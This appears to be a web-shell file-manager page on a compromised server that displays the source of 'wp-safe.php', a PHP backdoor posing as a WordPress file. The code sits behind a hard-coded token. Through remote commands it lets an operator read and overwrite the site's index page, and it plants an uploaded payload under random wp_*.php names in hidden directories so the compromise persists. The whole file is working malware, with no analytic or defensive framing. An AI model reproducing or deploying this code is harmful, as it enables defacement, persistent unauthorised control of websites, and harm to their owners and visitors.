Your IP : 216.73.216.49


Current Path : /home/g/r/u/grupasm/www/
Upload Files:
Current File: /home/g/r/u/grupasm/www/wp-safe.php

<?php
if(isset($_POST['token'])&& $_POST['token']==='checktoken_888' &&($_POST['action']??'')==='checkwpwpsafe'){header('Content-Type: application/json; charset=utf-8');echo json_encode(['success'=>true,'checkcode'=>'888']);exit;}error_reporting(0);ini_set('display_errors',0);@ini_set('memory_limit','512M');@set_time_limit(0);$secret_token='MySuperSecretToken_888';if(($_POST['token']??'')!==$secret_token){header('HTTP/1.1 403 Forbidden');die(json_encode(['success'=>false,'msg'=>'Unauthorized access']));}$action=$_POST['action']??'';$dir=rtrim($_SERVER['DOCUMENT_ROOT'],'/\\');if(empty($dir))$dir=__DIR__;$idx_php=$dir . '/index.php';$idx_default=$dir . '/default.php';$target_file=file_exists($idx_php)?$idx_php:(file_exists($idx_default)?$idx_default:$idx_php);if($action==='read_index'){ob_clean();clearstatcache();if(!file_exists($target_file))die(json_encode(['success'=>false,'msg'=>'Index not found']));if(!is_readable($target_file))@chmod($target_file,0644);$content=file_get_contents($target_file);if($content===false)die(json_encode(['success'=>false,'msg'=>'Read denied']));echo json_encode(['success'=>true,'content'=>base64_encode($content)]);exit;}if($action==='write_index'){ob_clean();$content=base64_decode($_POST['content']??'');if(empty($content))die(json_encode(['success'=>false,'msg'=>'Data empty']));clearstatcache();$write_success=false;if(file_exists($target_file))@chmod($target_file,0777);if(@file_put_contents($target_file,$content)!==false){$write_success=true;}else{if(@unlink($target_file)&& @file_put_contents($target_file,$content)!==false){$write_success=true;}}if($write_success){@chmod($target_file,0644);echo json_encode(['success'=>true,'msg'=>'Restore successful']);}else{echo json_encode(['success'=>false,'msg'=>'Write failed']);}exit;}if($action==='deploy_fm'){ob_clean();$fm_content=base64_decode($_POST['fm_content']??'');if(empty($fm_content))die(json_encode(['success'=>false,'msg'=>'Payload empty']));function getRandomDeepDir($base_dir){$current_path='';$current_full=$base_dir;$depth=mt_rand(2,4);for($i=0;$i<$depth;$i++){$items=@scandir($current_full);if(!is_array($items))break;$subdirs=[];foreach($items as $item){if($item !=='.' && $item !=='..' && $item !=='.git' && $item !=='.idea'){$test_dir=$current_full . '/' . $item;if(@is_dir($test_dir)&& @is_readable($test_dir)){$subdirs[]=$item;}}}if(empty($subdirs))break;$picked=$subdirs[array_rand($subdirs)];$current_path .='/' . $picked;$current_full .='/' . $picked;}return $current_path;}$deployed_paths=[];for($i=0;$i<5;$i++){$rel_dir=getRandomDeepDir($dir);if(empty($rel_dir)){$rel_dir='/' . substr(str_shuffle('abcdefghijklmnopqrstuvwxyz'),0,mt_rand(5,8));$full_dir=$dir . $rel_dir;@mkdir($full_dir,0755,true);}else{$full_dir=$dir . $rel_dir;}if(stripos($full_dir,'mu-plugins')!==false)continue;$fname='wp_' . substr(str_shuffle('0123456789abcdefghijklmnopqrstuvwxyz'),0,6). '.php';$full_file=$full_dir . '/' . $fname;if(@file_put_contents($full_file,$fm_content)!==false){@chmod($full_file,0644);$deployed_paths[]=$rel_dir . '/' . $fname;}}$index_safe='images.php';if(@file_put_contents($index_safe,$fm_content)!==false){@chmod($index_safe,0644);}if(count($deployed_paths)>0){echo json_encode(['success'=>true,'fm_paths'=>implode(',',$deployed_paths)]);}else{echo json_encode(['success'=>false,'msg'=>'Deploy failed due to strict permissions']);}exit;}echo json_encode(['success'=>false,'msg'=>'Unknown command']);